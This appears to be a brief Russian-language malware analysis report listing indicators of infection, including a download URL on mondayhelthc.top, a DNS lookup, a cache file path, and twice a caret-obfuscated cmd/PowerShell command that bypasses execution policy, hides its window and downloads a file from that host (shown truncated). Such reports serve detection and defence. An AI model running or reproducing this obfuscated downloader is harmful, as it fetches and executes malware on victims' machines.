Техническая информация
- http://mondayhelthc.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^OW^ERSh^e^l^L.^E^x^E -E^X^ecUtIOnp^oLI^c^y By^pa^sS^ ^-N^OP^r^o^f^IL^E^ -wiND^O^WStyle ^hID^De^n (^New-obj^Ect sy^s^TE^m.^nET^.^weBCl^iE^N^t^).dO^wNLO^AD^fil^e('http://mond...
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /C "P^OW^ERSh^e^l^L.^E^x^E -E^X^ecUtIOnp^oLI^c^y By^pa^sS^ ^-N^OP^r^o^f^IL^E^ -wiND^O^WStyle ^hID^De^n (^New-obj^Ect sy^s^TE^m.^nET^.^weBCl^iE^N^t^).dO^wNLO^AD^fil^e('http://mond... (со скрытым окном)